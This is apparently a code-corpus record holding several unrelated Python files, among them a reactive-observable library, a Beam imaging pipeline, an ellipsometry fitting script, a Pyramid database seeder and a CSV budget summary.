    source = arg if isinstance(arg, Notifier) else arg.__notifier__
    return source.add_observer(notifier)
def maybe_observe(arg, notifier):
    """observe(arg, notifier), but only when *arg* is a stateflow wrapper."""
    if not is_wrapper(arg):
        return
    observe(arg, notifier)
def observe_args(args_helper: ArgsHelper, pass_args: Set[str], notifier):
    """Subscribe *notifier* to every wrapped argument except those listed
    (by position or name) in *pass_args*."""
    every_arg = chain(args_helper.iterate_args(), args_helper.iterate_kwargs())
    for index, name, arg in every_arg:
        if index in pass_args or name in pass_args:
            continue
        maybe_observe(arg, notifier)
class CallResult(Observable[T]):
    """Observable result of calling a decorated (reactive) function.

    On construction it subscribes its own notifier to every reactive input:
    dependency-only kwargs, the decorator's extra dependencies, and all
    wrapped call arguments not listed in ``pass_args``.  Subclasses define
    how ``_call`` is driven (sync, async, context manager, ...).
    """
    def __init__(self, decorated: DecoratedFunction, args, kwargs):
        with ScopedName(name=decorated.callable.__name__):
            self.decorated = decorated # type: DecoratedFunction
            self._notifier = Notifier()
            # use dep_only_args: these kwargs exist purely as dependencies --
            # observe them, then remove them from the real call kwargs.
            for name in decorated.decorator.dep_only_args:
                if name in kwargs:
                    arg = kwargs.pop(name)
                    if isinstance(arg, (list, tuple)):
                        for a in arg:
                            observe(a, self.__notifier__)
                    else:
                        observe(arg, self.__notifier__)
            # use other_deps: extra dependencies declared on the decorator.
            for dep in decorated.decorator.other_deps:
                maybe_observe(dep, self.__notifier__)
            self.args_helper = ArgsHelper(args, kwargs, decorated.signature, decorated.callable)
            self.args = self.args_helper.args
            self.kwargs = self.args_helper.kwargs
            # Re-entrancy guard used by _call to detect circular dependencies.
            self._update_in_progress = False
            # Creation site (minus the decorator frames) for error reports.
            self.call_stack = traceback.extract_stack()[:-3]
            observe_args(self.args_helper, self.decorated.decorator.pass_args, self.__notifier__)
    @property
    def __notifier__(self):
        return self._notifier
    # @contextmanager
    # def _handle_exception(self, reraise=True):
    #     try:
    #         yield
    #
    #     except Exception as e:
    #         if isinstance(e, HideStackHelper):
    #             e = e.__cause__
    #         if isinstance(e, SilentError):
    #             e = e.__cause__
    #             reraise = False  # SilentError is not re-raised by definition
    #         self._exception = e
    #         if reraise:
    #             raise HideStackHelper() from e
    def _call(self):
        """
        Evaluate the arguments and invoke the decorated callable.

        returns one of:
        - an Observable,
        - a raw value (must be wrapped into Observable)
        - a coroutine (must be awaited),
        - a context manager (must be __enter__ed to obtain value, then __exited__ before next __enter__)
        - an async context manager (a mix of above)
        """
        # NOTE(review): `self.callable` is never assigned (only
        # `self.decorated.callable`); if this assert ever fires, formatting
        # its message would raise AttributeError instead -- confirm.
        assert self._update_in_progress == False, 'circular dependency containing "{}" called at:\n{}'.format(
            self.callable.__name__, self.call_stack)
        try:
            self._update_in_progress = True
            args, kwargs = eval_args(self.args_helper, self.decorated.decorator.pass_args,
                                     self.decorated.callable.__name__, self.call_stack)
            try:
                return self.decorated.really_call(args, kwargs)
            except SilentError as e: # SilentError may be thrown from the function body too (e.g. from validators)
                # raise SilentError(EvalError(self.call_stack, e))
                raise e
            except Exception as e:
                # Wrap with the creation-site stack for better diagnostics.
                raise EvalError(self.call_stack, e)
        finally:
            self._update_in_progress = False
    @abstractmethod
    def __eval__(self):
        pass
class SyncCallResult(CallResult[T]):
    """Result of a plain synchronous function: evaluating simply calls it."""
    def __eval__(self):
        return self._call()
class AsyncCallResult(CallResult[T]):
    """Result of a coroutine function: must be awaited through __aeval__."""
    async def __aeval__(self):
        return await self._call()
    def __eval__(self):
        # Synchronous evaluation is impossible for an async dependency.
        raise Exception("called __eval__ on the value that depends on an asynchronously evaluated value; use __aeval__")
class CmCallResult(CallResult[T]):
    """Result of a context-manager-returning function: the value is obtained
    by entering the manager; the previous one is exited before each re-entry
    and on garbage collection."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.cm = None  # the currently-entered context manager, if any
    def __eval__(self):
        # Exit the previous manager before entering a fresh one.
        self._cleanup()
        self.cm = self._call()
        return self.cm.__enter__()
    def __del__(self):
        self._cleanup()
    def _cleanup(self):
        """Exit and forget the current context manager; never propagate."""
        try:
            if self.cm:
                self.cm.__exit__(None, None, None)
                self.cm = None
        except Exception:
            logging.exception("ignoring exception in cleanup")
class AsyncCmCallResult(CallResult[T]):
    """Async-context-manager variant of CmCallResult: the value comes from
    ``__aenter__`` and cleanup awaits ``__aexit__``."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.cm = None  # the currently-entered async context manager, if any
    async def __aeval__(self):
        await self._cleanup()
        self.cm = self._call()
        return await self.cm.__aenter__()
    def __del__(self):
        # NOTE(review): scheduling cleanup from __del__ requires a running
        # event loop; at interpreter shutdown this may fail -- confirm.
        asyncio.ensure_future(self._cleanup())
    async def _cleanup(self):
        """Exit and forget the current manager; never propagate."""
        try:
            if self.cm:
                # Clear self.cm first so a concurrent cleanup cannot
                # double-exit the same manager.
                cm = self.cm
                self.cm = None
                await cm.__aexit__(None, None, None)
        except Exception:
            logging.exception("ignoring exception in cleanup")
    def __eval__(self):
        raise_need_async_eval()
| StarcoderdataPython |
1639237 | <reponame>Enucatl/machine-learning-aging-brains
import apache_beam as beam
import agingbrains
import agingbrains.io
import agingbrains.read_gender
import agingbrains.voxel_fit
class CorrelationOptions(beam.utils.options.PipelineOptions):
    """Pipeline options: input NIfTI glob, gender-target CSV, output path,
    and an optional switch to process only a test slice of each volume."""
    @classmethod
    def _add_argparse_args(cls, parser):
        parser.add_argument(
            "--input",
            dest="input",
            default="data/set_train/train_1*.nii"
        )
        parser.add_argument(
            "--genders",
            dest="genders",
            default="data/mlp3-targets.csv"
        )
        parser.add_argument(
            "--output",
            dest="output",
            default="output/GENDER_OUTPUT"
        )
        parser.add_argument(
            "--test_slice",
            dest="test_slice",
            action="store_true"
        )
if __name__ == "__main__":
    # Build and run the Beam pipeline: read brain volumes and gender labels,
    # join them per subject, fan out to per-voxel records, group by voxel,
    # score each voxel, and write gzip-compressed text shards.
    pipeline_options = beam.utils.options.PipelineOptions()
    p = beam.Pipeline(options=pipeline_options)
    options = pipeline_options.view_as(CorrelationOptions)
    datasets = p | "ReadTrainDataset" >> agingbrains.io.ReadNifti1(
        options.input,
        test_slice=options.test_slice)
    genders = p | "ReadGenders" >> agingbrains.read_gender.ReadGender(
        options.genders, options.input)
    brain_correlation_map = ({"data": datasets, "gender": genders}
        | "GroupWithGender" >> beam.CoGroupByKey()
        | beam.core.FlatMap(agingbrains.voxel_fit.emit_voxels)
        | beam.GroupByKey()
        | beam.core.Map(agingbrains.voxel_fit.fisher_score)
        | beam.core.Map(agingbrains.io.save_correlation)
        | beam.io.WriteToText(
            options.output,
            compression_type=beam.io.fileio.CompressionTypes.GZIP,
            file_name_suffix=".tgz")
    )
    p.run()
| StarcoderdataPython |
5148781 | # -*- coding: utf-8 -*-
"""
hangulize.normalization
~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2017 by <NAME>
:license: BSD, see LICENSE for more details.
"""
import unicodedata
__all__ = ['normalize_roman']
def normalize_roman(string, additional=None):
    """Removes diacritics from the string and converts to lowercase::

        >>> normalize_roman(u'Eèé')
        u'eee'

    :param string: the text to normalize.
    :param additional: optional mapping of characters to replacements; both
        its keys and its values are exempt from the generic normalization
        (keys are substituted by their mapped value, values pass through).
    """
    if additional:
        # A set makes the per-character membership test O(1); the original
        # rebuilt a list of keys+values and scanned it for every character.
        safe = set(additional) | set(additional.values())
        def gen():
            for c in string:
                if c in additional:
                    yield additional[c]
                elif c in safe:
                    # A mapped-to value: keep verbatim.
                    yield c
                else:
                    yield normalize_roman(c)
        return ''.join(gen())
    chars = []
    for c in string:
        if unicodedata.category(c) == 'Lo':
            # 'Lo' (Letter, other) covers caseless scripts without useful
            # NFD decompositions (e.g. CJK); keep them as-is.
            chars.append(c)
        else:
            # Decompose, then drop combining marks ('Mn') -- the diacritics.
            nor = unicodedata.normalize('NFD', c)
            chars.extend(x for x in nor if unicodedata.category(x) != 'Mn')
    return ''.join(chars).lower()
| StarcoderdataPython |
# PyPy shim for the _ctypes_test helper extension: ensure we are on PyPy
# (cpyext present), disable PyObj_FromPtr, then locate a previously built
# _ctypes_test shared object or compile it on demand.
import imp
import os
try:
    import cpyext
except ImportError:
    # Not running on PyPy with cpyext -- behave as if the module is absent.
    raise ImportError("No module named '_ctypes_test'")
try:
    import _ctypes
    _ctypes.PyObj_FromPtr = None
    del _ctypes
except ImportError:
    pass # obscure condition of _ctypes_test.py being imported by py.test
else:
    import _pypy_testcapi
    cfile = '_ctypes_test.c'
    thisdir = os.path.dirname(__file__)
    # Build-output directory keyed by a hash of the C source contents.
    output_dir = _pypy_testcapi.get_hashed_dir(os.path.join(thisdir, cfile))
    try:
        fp, filename, description = imp.find_module('_ctypes_test', path=[output_dir])
        with fp:
            imp.load_module('_ctypes_test', fp, filename, description)
    except ImportError:
        if os.name == 'nt':
            # hack around finding compilers on win32: importing setuptools
            # patches distutils' compiler detection as a side effect.
            try:
                import setuptools
            except ImportError:
                pass
        print('could not find _ctypes_test in %s' % output_dir)
        _pypy_testcapi.compile_shared('_ctypes_test.c', '_ctypes_test', output_dir)
| StarcoderdataPython |
4823810 | <reponame>data-stories/chart-experiment<filename>demo/sample_batches.py
sample_batches ={
"0": {
"pie": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
},
"1": {
"pie": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MR", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
},
"2": {
"pie": [
["MR", "dd06", "sano", "sm0", "ftns", "fs16", "llcl", "pano", "we00", "ro270","ad95"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95"]
],
"donut": [
["MR", "dd06", "sano", "sm0", "ftfa", "fs16", "llcl", "pano", "we00", "ro270","ad95","dh2"],
["CR", "dd06", "sa00", "sm1", "ftse", "fs18", "llcr", "pa05", "we05", "ro000", "ad07","dh5"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llcl", "pano", "we05", "ro090", "ad11","dh2"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llcr", "pa03", "we10", "ro000", "ad95", "dh8"]
],
"bar": [
["MG", "dd06", "sano", "sm0", "ftfa", "fs16", "llul", "pano", "e00a0", "bw6", "bs000", "boh", "gr0y"],
["CL", "dd06", "sa00", "sm1", "ftse", "fs18", "llur", "pa05", "e00a1", "bw4", "bs000", "bov", "gr0y"],
["CM", "dd12", "sano", "sm0", "ftns", "fs12", "llul", "pano", "e10a1", "bw6", "bs000", "boh", "gr00"],
["MB", "dd12", "sa00", "sm1", "ftns", "fs14", "llur", "pa03", "e11a1", "bw8", "bs000", "bov", "gr00"]
]
}
} | StarcoderdataPython |
3355559 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import re
class AtWikiStripper(object):
    """Strip @wiki (atwiki.jp) markup from a page source, leaving plain text.

    Inline constructs are removed iteratively until the line is stable;
    line-level constructs are reduced to their payload; block annotations
    (``#name(...){{{ ... }}}``) are tracked with a nesting level so that
    their delimiter lines are dropped.
    """
    # Comment: `// comment`
    COMMENT = re.compile(r'^//')
    # Inline annotation: `&color(#999999){text}`, `&nicovideo(url)`
    INLINE_ANN = re.compile(r'&[a-z_]+\(([^()]*?)\)({([^{}]+?)})?'), 3
    # Inline links: `[[page]]`, `[[alias>URL]]`
    INLINE_LINK = re.compile(r'\[\[(.+?)((>|>>)(.+?))?\]\]'), 1
    # Inline italic: `'''text'''`
    INLINE_ITALIC = re.compile(r'\'\'\'(.+?)\'\'\''), 1
    # Inline bold: `''text''`
    INLINE_BOLD = re.compile(r'\'\'(.+?)\'\''), 1
    # Inline del: `%%text%%`
    INLINE_DEL = re.compile(r'%%(.+?)%%'), 1
    # Line annotation: `#right(){text}`, `#comment()`, `#region`
    LINE_ANN = re.compile(r'^#[a-z_]+(\(([^()]*?)\)({([^{}]+?)})?)?\s*$'), 4
    # Line horizontal line: `----`
    LINE_HR = re.compile(r'^----\s*()$'), 1
    # Line item list and heading: `+foo`, `-foo`, `*foo`
    LINE_ITEMLIST = re.compile(r'^(\*+|\++|-+)(.+)$'), 2
    # Line quote: `>text`
    LINE_QUOTE = re.compile(r'^>+(.+)$'), 1
    # Line formatted: ` text`
    LINE_PRE = re.compile(r'^ (.+)$'), 1
    # Block annotation: `#exk(){{{` ... `}}}`
    BLOCK_BEGIN_ANN = re.compile(r'^#[a-z_]+\(([^{}()]*?)\)({+)\s*$')
    BLOCK_END_ANN = re.compile(r'^(}+)\s*$')

    def __init__(self, source):
        self._source = source

    def _inline_strip(self, line, pattern, group):
        """Repeatedly replace *pattern* by its capture *group* until stable."""
        while True:
            prev = line
            # BUG FIX: the kept group may be unmatched (e.g. `&nicovideo(url)`
            # has no `{...}` part), in which case m.group(group) is None and
            # re.sub would raise TypeError; substitute '' instead.
            # (A replacement *function* is also needed because, prior to
            # Python 3.5, a backreference to a nonmatching group in a
            # replacement string raised an exception.)
            line = pattern.sub(lambda m: m.group(group) or '', line)
            if prev == line:
                return line

    def _line_process(self, buf, line, pattern, group):
        """If *pattern* rewrites the line, append the result to *buf*.

        Returns True when the line was consumed by this rule.
        """
        prev = line
        # BUG FIX: same unmatched-group guard as in _inline_strip (e.g. the
        # bare `#region` form of LINE_ANN has no parenthesized payload).
        line = pattern.sub(lambda m: m.group(group) or '', line)
        if prev == line:
            return False
        buf.append(line)
        return True

    def text(self):
        """Return the plain-text rendering of the wiki source."""
        ret = []
        lines = self._source.splitlines()
        block_level = 0  # brace count of the currently open `{{{` block, 0 if none
        for line in lines:
            if self.COMMENT.match(line):
                continue
            line = self._inline_strip(line, *self.INLINE_ANN)
            line = self._inline_strip(line, *self.INLINE_LINK)
            line = self._inline_strip(line, *self.INLINE_ITALIC)
            line = self._inline_strip(line, *self.INLINE_BOLD)
            line = self._inline_strip(line, *self.INLINE_DEL)
            if self._line_process(ret, line, *self.LINE_ANN):
                continue
            if self._line_process(ret, line, *self.LINE_HR):
                continue
            if self._line_process(ret, line, *self.LINE_ITEMLIST):
                continue
            if self._line_process(ret, line, *self.LINE_QUOTE):
                continue
            if self._line_process(ret, line, *self.LINE_PRE):
                continue
            if block_level == 0:
                m = self.BLOCK_BEGIN_ANN.match(line)
                if m:
                    block_level = len(m.group(2))
                    continue
            else:
                m = self.BLOCK_END_ANN.match(line)
                if m and len(m.group(1)) == block_level:
                    block_level = 0
                    continue
            ret.append(line)
        return '\n'.join(ret)
| StarcoderdataPython |
3232253 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script used to analyze the ellipsometry data recorded on the Picometer Light ellipsometer available at the
Partneship for soft condensed matter at the Institut Laue-Langevin, Grenoble. The script uses the tmm package
developed by <NAME> (see https://pypi.org/project/tmm/ for full details) and the lmfit package
(https://lmfit.github.io/lmfit-py/).
@author: <NAME>
"""
date = '2020.03.24'
version = '0.2'
import pandas as pd
import matplotlib.pyplot as plt
import os
import itertools
import numpy as np
from lmfit import minimize, Parameters, fit_report
basepath = '/data/owncloud/PostDoc-ILL/Lukas/Ellipsometry/200221ellipso/' #Folder where the datafiles are contained.
from tmm import ellips
fit_xy = False #are the data in xy fitted? Otherwise delta and psi will be fitted.
degree = np.pi/180
wl = 632.8 #Laser wavelength, given in nm
''' define the model here. For each layer, a couple of parameters d_i and n_i need to be defined.
Set the guessed value for the parameter, its limits and if it has to be optmized or not. '''
fit_params = Parameters()
fit_params.add('d0', value= np.inf, vary=False) #Incoming medium thickness (eg air or water)
fit_params.add('n0', value= 1, vary=False) #Incoming medium refractive index
fit_params.add('d1', value= 2.1, vary=True, min = 20.0, max = 100) #1st layer thickness, nm
fit_params.add('n1', value= 1.55, vary=True, min=1.3, max=1.6) #1st layer refractive index
#fit_params.add('d11', value= 50.1, vary=True, min = 0.0, max = 200) #1st layer thickness, nm
#fit_params.add('n11', value= 1.55, vary=True, min=1.2, max=1.6) #1st layer refractive index
fit_params.add('d2', value= 5.0, vary=False) #2st layer thickness, nm (SiO2)
fit_params.add('n2', value= 1.46, vary=False) #2st layer refractive index
fit_params.add('d3', value= np.inf, vary=False) #2st layer thickness, nm (Si)
fit_params.add('n3', value= 3.87, vary=False) #2st layer refractive index
elements = list(itertools.chain(*[(key, str(key)+'_err') for key in fit_params.valuesdict()]))
fitted_params = pd.DataFrame(columns=elements) #Pandas DataFrame where all fit parameters are saved.
def ell(pars,ang,wl):
    '''Compute the ellipsometric angles (psi, delta) for a layer stack.

    *pars* is an lmfit Parameters object whose 'n*' entries are refractive
    indices and 'd*' entries are thicknesses (nm), ordered from the incoming
    medium to the substrate; *ang* is an iterable of incidence angles in
    degrees; *wl* is the wavelength in nm.
    '''
    vals = pars.valuesdict()
    # Parameter-name convention: keys containing 'n' are indices, keys
    # containing 'd' are thicknesses (names like n0/d0 never overlap).
    ns = [vals[key] for key in vals if 'n' in key] #List of refractive indices, starting from air to the substrate
    ds = [vals[key] for key in vals if 'd' in key] #List of layer thicknesses (nm), starting from air to the substrate
    psi = [ellips(ns, ds, i*degree, wl)['psi'] for i in ang]
    # NOTE(review): delta is reported as (pi - Delta); presumably this maps
    # tmm's convention onto the instrument's -- confirm. Values are radians.
    delta = np.pi - np.array([ellips(ns, ds, i*degree, wl)['Delta'] for i in ang])
    return psi, delta
def psidelta_in_xy(psi, delta):
    """Convert ellipsometric angles (psi, delta) to the (x, y) representation:
    x = -sin(2*psi)*cos(delta), y = sin(2*psi)*sin(delta)."""
    sin_two_psi = np.sin(2 * np.asarray(psi))
    x = -sin_two_psi * np.cos(delta)
    y = sin_two_psi * np.sin(delta)
    return x, y
def fcn2min(pars, data):
    """Residual vector for lmfit.minimize.

    *data* columns are [angle_deg, measured_1, measured_2], where the
    measured pair is (x, y) when the module-level ``fit_xy`` flag is set and
    (psi, delta) otherwise.
    """
    psi, delta = ell(pars, data[:, 0], wl)
    if fit_xy is True:
        # BUG FIX: this branch computed (x, y) but then subtracted *psi*
        # from both measured columns; compare against x and y instead.
        x, y = psidelta_in_xy(psi, delta)
        res1 = data[:, 1] - x
        res2 = data[:, 2] - y
    else:
        res1 = data[:, 1] - psi
        res2 = data[:, 2] - delta
    return np.concatenate([res1, res2])
plt.clf()
with open(os.path.join(basepath,'fit_out.csv'), 'w+') as f:
f.write('#Data analyzed with pyEll, version {} from {}. \n'.format(version, date))
for filename in sorted(os.listdir(basepath)):
if filename.endswith(".txt"):
if fit_xy is True:
if filename.endswith("epd.txt") is False:
data = np.loadtxt(basepath+filename, skiprows=1, usecols=(5,0,1), unpack=False)
fcn2min(fit_params, data)
out = minimize(fcn2min, fit_params, kws = {'data': data}, method='leastsq')
psi, delta = ell(out.params,data[:,0],wl)
x, y = psidelta_in_xy(psi, delta)
print(fit_report(out))
plt.figure()
plt.plot(data[:,0], np.asarray(y[:]), label='y')
plt.plot(data[:,0], np.asarray(x[:]), label='x')
plt.xlabel('Angle / deg')
plt.ylabel('x, y')
plt.plot(data[:,0], data[:,1], 'ro')
plt.plot(data[:,0], data[:,2], 'bs')
plt.legend()
plt.savefig(os.path.join(basepath, filename.split('_xy')[0] + '.pdf'))
plt.close()
outfile = 'fit-' + filename.split('_xy')[0] + '.dat'
np.savetxt(os.path.join(basepath, outfile), np.transpose([data[:,0], np.asarray(delta[:])*180./np.pi, np.asarray(psi[:])*180./np.pi]), delimiter="\t")
# out_values = out.params.valuesdict()
out_values = {}
for key in out.params.valuesdict():
out_values[key] = out.params[key].value
out_values[str(key)+'_err'] = out.params[key].stderr
fitted_params.loc[filename.split('_')[0]] = out_values
# for key in out_values if 'n' in key:
# fit_params[filename.split('_')[0]][key] = out.params[key].value
# fit_params[filename.split('_')[0]][str(key)+ '_err'] = out.params[key].value
# key: ,
# str(key) + '_err': out.params[key].stderr
# with open(os.path.join(basepath,'fit_out.out'), 'a') as f:
# f.write('{:s} \t {:.2f} \t {:.2f} \t {:.3f} \t {:.3f} \n'.format(filename.split('_')[0], out.params['d1'].value, out.params['d1'].stderr, out.params['n1'].value, out.params['n1'].stderr))
else:
if filename.endswith("epd.txt"):
print(filename)
tmp = np.loadtxt(basepath+filename, skiprows=1, usecols=(5,0,1), unpack=False)
data = tmp[~np.isnan(tmp).any(axis=1)] #all nanvalues are dropped.
fcn2min(fit_params, data)
#print(data)
out = minimize(fcn2min, fit_params, kws = {'data': data}, method='leastsq')
psi, delta = ell(out.params,data[:,0],wl)
print(fit_report(out))
plt.figure()
plt.plot(data[:,0], np.asarray(psi[:])*180./np.pi)
plt.plot(data[:,0], np.asarray(delta[:])*180./np.pi)
plt.plot(data[:,0], data[:,1]*180./np.pi, 'ro', label='psi')
plt.plot(data[:,0], data[:,2]*180./np.pi, 'bs', label='delta')
plt.xlabel('Angle / deg')
plt.ylabel('Psi, Delta / deg')
plt.legend()
plt.savefig(os.path.join(basepath, filename.split('_epd')[0] + '.pdf'))
plt.close()
outfile = 'fit-' + filename.split('_epd')[0] + '.dat'
np.savetxt(os.path.join(basepath,outfile), np.transpose([data[:,0], np.asarray(delta[:])*180./np.pi, np.asarray(psi[:])*180./np.pi]), delimiter="\t")
out_values = {}
for key in out.params.valuesdict():
out_values[key] = out.params[key].value
out_values[str(key)+'_err'] = out.params[key].stderr
fitted_params.loc[filename.split('_')[0]] = out_values
# with open(os.path.join(basepath,'fit_out.out'), 'a') as f:
# f.write('{:s} \t {:.2f} \t {:.2f} \t {:.3f} \t {:.3f} \n'.format(filename.split('_')[0], out.params['d1'].value, out.params['d1'].stderr, out.params['n1'].value, out.params['n1'].stderr))
fitted_params.to_csv(os.path.join(basepath,'fit_out.csv'), mode='a') | StarcoderdataPython |
5158293 | import unittest
from src.data import TBDatabase
class TestTBDatabase(unittest.TestCase):
    """Smoke test: the schema can be created on a fresh database file."""
    def test_create_schema(self):
        # NOTE(review): writes 'test.db' into the working directory and never
        # removes it; consider a tempfile plus tearDown cleanup.
        db = TBDatabase('test.db')
        db.create_schema()
        db.close()

if __name__ == '__main__':
    unittest.main()
| StarcoderdataPython |
6695819 | <filename>pyramid/MyShop/myshop/scripts/initializedb.py
import os
import sys
import transaction
from sqlalchemy import engine_from_config
from pyramid.paster import (
get_appsettings,
setup_logging,
)
from pyramid.scripts.common import parse_vars
from ..models import (
DBSession,
#MyModel,
User,
Group,
Base,
Permission, Category, Item)
def usage(argv):
    """Print a usage message (program name taken from argv[0]) and exit
    with status 1."""
    prog = os.path.basename(argv[0])
    message = ('usage: %s <config_uri> [var=value]\n'
               '(example: "%s development.ini")' % (prog, prog))
    print(message)
    sys.exit(1)
def main(argv=sys.argv):
    """Initialize the MyShop database from a Pyramid config and seed it with
    default permissions, an admin group/user, categories and one item."""
    if len(argv) < 2:
        usage(argv)
    config_uri = argv[1]
    options = parse_vars(argv[2:])
    setup_logging(config_uri)
    settings = get_appsettings(config_uri, options=options)
    engine = engine_from_config(settings, 'sqlalchemy.')
    DBSession.configure(bind=engine)
    Base.metadata.create_all(engine)
    with transaction.manager:
        #model = MyModel(name='one', value=1)
        #DBSession.add(model)
        # Permissions: item, user and order management.
        perm_item_manage = Permission()
        perm_item_manage.name = 'item'
        DBSession.add(perm_item_manage)
        perm_user_manage = Permission()
        perm_user_manage.name = 'user'
        DBSession.add(perm_user_manage)
        perm_order_manage = Permission()
        perm_order_manage.name = 'order'
        DBSession.add(perm_order_manage)
        # Administrators group holds all three permissions.
        gadmin = Group()
        gadmin.name = 'Administrators'
        gadmin.permissions.append(perm_item_manage)
        gadmin.permissions.append(perm_order_manage)
        gadmin.permissions.append(perm_user_manage)
        DBSession.add(gadmin)
        # Default admin account.
        admin = User()
        admin.name = 'admin'
        # NOTE(review): '<PASSWORD>' and '<EMAIL>' are dataset-anonymization
        # placeholders; the original seed values are unknown -- confirm.
        admin.password = '<PASSWORD>'
        admin.email = '<EMAIL>'
        admin.group = gadmin
        DBSession.add(admin)
        # Category tree: Food -> (Fruit, Vegetable).
        cat_food = Category()
        cat_food.name = 'Food'
        DBSession.add(cat_food)
        cat_fruit = Category()
        cat_fruit.name = 'Fruit'
        cat_fruit.parent = cat_food
        DBSession.add(cat_fruit)
        cat_vegetable = Category()
        cat_vegetable.name = 'Vegetable'
        cat_vegetable.parent = cat_food
        DBSession.add(cat_vegetable)
        # Sample item under Fruit; description is rendered as HTML.
        iapple = Item()
        iapple.name = 'Apple'
        iapple.description = '<h2>This is a <span style="color:red;">red</span> apple</h2>'
        iapple.price = 1.3
        iapple.category = cat_fruit
        DBSession.add(iapple)
| StarcoderdataPython |
6409497 | import os
import csv
# Summarize Resources/budget_data.csv (columns: Date, Profit/Losses):
# month count, net total, average month-over-month change, and the months
# with the greatest and smallest profit values.
csvpath = os.path.join('Resources', 'budget_data.csv')

with open(csvpath) as csvfile:
    csvreader = csv.reader(csvfile, delimiter=',')

    # Skip the header row.
    csv_header = next(csvreader)

    # Initialize running state from the first data row.
    first_row = next(csvreader)
    first_profit = int(first_row[1])
    current_profit = first_profit
    greatest_profit = first_profit
    greatest_loss = first_profit
    # BUG FIX: profit_month/loss_month were previously only assigned when a
    # later row beat the first row's value, so a dataset whose extreme was in
    # the first row crashed with NameError; seed them from the first row.
    profit_month = first_row[0]
    loss_month = first_row[0]
    total_months = 1
    total_profit = first_profit

    for row in csvreader:
        current_profit = int(row[1])
        total_months = total_months + 1
        total_profit = total_profit + current_profit
        # NOTE(review): "greatest increase/decrease" is tracked as the largest
        # and smallest profit VALUE (original behavior); some specs define it
        # as the largest month-over-month change -- confirm requirements.
        if (greatest_profit < current_profit):
            greatest_profit = current_profit
            profit_month = row[0]
        if (greatest_loss > current_profit):
            greatest_loss = current_profit
            loss_month = row[0]

    # BUG FIX: "Average Change" used to be total_profit / total_months, i.e.
    # the mean monthly PROFIT. The average month-over-month change is the sum
    # of successive differences -- which telescopes to (last - first) --
    # divided by the number of gaps (months - 1).
    if total_months > 1:
        average_change = round((current_profit - first_profit) / (total_months - 1), 2)
    else:
        average_change = 0

print(f"Total months: {total_months}")
print(f"Total: ${total_profit}")
print(f"Average Change: ${average_change}")
print(f"Greatest Increase in Profits: {profit_month} (${greatest_profit})")
print(f"Greatest Decrease in Profits: {loss_month} (${greatest_loss})")

# Write the same report lines to Results.csv.
output_path = os.path.join("Results.csv")
with open(output_path, 'w', newline='') as csvfile:
    # Initialize csv.writer
    csvwriter = csv.writer(csvfile)
    csvwriter.writerow([f"Total months: {total_months}"])
    csvwriter.writerow([f"Total: ${total_profit}"])
    csvwriter.writerow([f"Average Change: ${average_change}"])
    csvwriter.writerow([f"Greatest Increase in Profits: {profit_month} (${greatest_profit})"])
    csvwriter.writerow([f"Greatest Decrease in Profits: {loss_month} (${greatest_loss})"])
| StarcoderdataPython |
